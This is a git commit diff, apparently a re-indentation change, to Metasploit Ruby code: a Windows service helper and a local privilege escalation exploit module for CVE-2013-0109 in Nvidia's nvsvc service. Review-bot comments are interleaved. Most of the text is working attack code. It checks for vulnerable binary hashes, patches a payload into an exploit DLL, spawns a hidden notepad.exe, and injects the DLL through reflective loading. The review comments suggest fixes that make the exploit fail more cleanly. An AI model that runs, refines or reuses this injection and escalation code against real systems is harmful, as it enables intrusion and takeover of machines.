parent
5eca4714c2
commit
819ba30a33
|
@ -292,7 +292,7 @@ module Services
|
||||||
# Now to grab a handle to the service.
|
# Now to grab a handle to the service.
|
||||||
# Thank you, Wine project for defining the DELETE constant since it,
|
# Thank you, Wine project for defining the DELETE constant since it,
|
||||||
# and all its friends, are missing from the MSDN docs.
|
# and all its friends, are missing from the MSDN docs.
|
||||||
# #define DELETE 0x00010000
|
# #define DELETE 0x00010000
|
||||||
handle = adv.OpenServiceA(manager, name, 0x10000)
|
handle = adv.OpenServiceA(manager, name, 0x10000)
|
||||||
if (handle["return"] == 0)
|
if (handle["return"] == 0)
|
||||||
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||||
|
@ -312,7 +312,7 @@ module Services
|
||||||
#
|
#
|
||||||
# @param (see #service_start)
|
# @param (see #service_start)
|
||||||
#
|
#
|
||||||
# @return {} representing lpServiceStatus
|
# @return {} representing lpServiceStatus
|
||||||
#
|
#
|
||||||
# @raise (see #service_start)
|
# @raise (see #service_start)
|
||||||
#
|
#
|
||||||
|
|
|
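Review bot: The failure path `raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")` drops the one piece of context the caller needs, the service name, and uses the `RuntimeError.new` form where Ruby convention is class plus message; `raise RuntimeError, "Could not open service '#{name}'. OpenServiceA error: #{handle["GetLastError"]}"` keeps the same exception type for callers that rescue it. The handle is opened with DELETE access only (0x10000), which is the least privilege for a delete, but what happens to it after this hunk (CloseServiceHandle on every path) is outside the visible lines and should be confirmed. Both hunks keep identical line counts on the old and new side, so this appears to be a re-indentation commit; the enclosing method starts and ends outside the hunk.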
@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info, {
|
super(update_info(info, {
|
||||||
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
|
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
|
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
|
||||||
interact with the service. The service has a stacked based buffer overflow as a result
|
interact with the service. The service has a stacked based buffer overflow as a result
|
||||||
of a memmove operation.
|
of a memmove operation.
|
||||||
|
|
||||||
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
|
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
|
||||||
|
|
||||||
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
|
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
|
||||||
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
|
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Peter Wintersmith', # Original exploit
|
'Peter Wintersmith', # Original exploit
|
||||||
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
|
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86_64,
|
'Arch' => ARCH_X86_64,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'SessionTypes' => [ 'meterpreter' ],
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic', { } ]
|
[ 'Automatic', { } ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2048,
|
'Space' => 2048,
|
||||||
'DisableNops' => true
|
'DisableNops' => true
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2013-0109' ],
|
[ 'CVE', '2013-0109' ],
|
||||||
[ 'OSVDB', '88745' ],
|
[ 'OSVDB', '88745' ],
|
||||||
|
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
rescue RuntimeError => e
|
rescue RuntimeError => e
|
||||||
print_error("Unable to retrieve service status")
|
print_error("Unable to retrieve service status")
|
||||||
end
|
end
|
||||||
|
|
||||||
if sysinfo['Architecture'] =~ /WOW64/i
|
if sysinfo['Architecture'] =~ /WOW64/i
|
||||||
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
|
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
else
|
else
|
||||||
path = svc['Command'].strip
|
path = svc['Command'].strip
|
||||||
end
|
end
|
||||||
|
|
||||||
begin
|
begin
|
||||||
hash = client.fs.file.md5(path).unpack('H*').first
|
hash = client.fs.file.md5(path).unpack('H*').first
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if vuln_hashes.include?(hash)
|
if vuln_hashes.include?(hash)
|
||||||
vprint_good("Hash '#{hash}' is listed as vulnerable")
|
vprint_good("Hash '#{hash}' is listed as vulnerable")
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
else
|
else
|
||||||
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
|
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
end
|
end
|
||||||
|
@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_proc
|
def create_proc
|
||||||
windir = expand_path("%windir%")
|
windir = expand_path("%windir%")
|
||||||
cmd = "#{windir}\\system32\\notepad.exe"
|
cmd = "#{windir}\\system32\\notepad.exe"
|
||||||
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
||||||
end
|
end
|
||||||
|
|
||||||
def is_running?
|
def is_running?
|
||||||
begin
|
begin
|
||||||
status = service_status('nvsvc')
|
status = service_status('nvsvc')
|
||||||
return (status and status[:state] == 4)
|
return (status and status[:state] == 4)
|
||||||
rescue RuntimeError => e
|
rescue RuntimeError => e
|
||||||
print_error("Unable to retrieve service status")
|
print_error("Unable to retrieve service status")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
else
|
else
|
||||||
print_good("Service is running")
|
print_good("Service is running")
|
||||||
end
|
end
|
||||||
|
|
||||||
dll = ''
|
|
||||||
offset = nil
|
|
||||||
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
|
||||||
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
|
||||||
|
|
||||||
pay = payload.encoded
|
dll = ''
|
||||||
|
offset = nil
|
||||||
|
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
||||||
|
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
||||||
|
|
||||||
bo = dll.index('PAYLOAD:')
|
pay = payload.encoded
|
||||||
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
|
||||||
dll[bo, pay.length] = [pay].pack("a*")
|
|
||||||
|
|
||||||
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
bo = dll.index('PAYLOAD:')
|
||||||
|
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
||||||
|
dll[bo, pay.length] = [pay].pack("a*")
|
||||||
|
|
||||||
pe.exports.entries.each do |entry|
|
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
||||||
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
|
||||||
offset = pe.rva_to_file_offset( entry.rva )
|
|
||||||
break
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
print_error("No offset found") unless offset
|
pe.exports.entries.each do |entry|
|
||||||
|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
||||||
|
offset = pe.rva_to_file_offset( entry.rva )
|
||||||
|
break
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
new_pid = create_proc
|
print_error("No offset found") unless offset
|
||||||
|
|
||||||
if not new_pid
|
new_pid = create_proc
|
||||||
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
|
||||||
end
|
|
||||||
|
|
||||||
vprint_status("Injecting payload into memory")
|
if not new_pid
|
||||||
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
||||||
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
end
|
||||||
host_process.memory.protect(mem)
|
|
||||||
host_process.memory.write(mem, dll)
|
vprint_status("Injecting payload into memory")
|
||||||
|
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
||||||
|
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
||||||
|
host_process.memory.protect(mem)
|
||||||
|
host_process.memory.write(mem, dll)
|
||||||
print_status("Executing exploit...")
|
print_status("Executing exploit...")
|
||||||
host_process.thread.create(mem+offset)
|
host_process.thread.create(mem+offset)
|
||||||
end
|
end
|
||||||
|
|
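Review bot: In the last hunk, `print_error("No offset found") unless offset` only logs when no ReflectiveLoader export is found and execution continues into `create_proc`, the memory allocation and `host_process.thread.create(mem+offset)`, where `mem + nil` raises a TypeError after a hidden notepad.exe has already been spawned and is left running on the target. Replacing the log with `fail_with(Exploit::Failure::Unknown, "No ReflectiveLoader export found in exploit.dll") unless offset` aborts before the host process is created. The allocation size `dll.length + (dll.length % 1024)` also reads like an attempt to round up to a 1024-byte multiple but adds the remainder instead; it never under-allocates, so it is harmless, but if rounding is the intent `(dll.length + 1023) & ~1023` says so. The hunk counts are unchanged on both sides, so this looks like a re-indentation commit; the enclosing method begins outside the hunk.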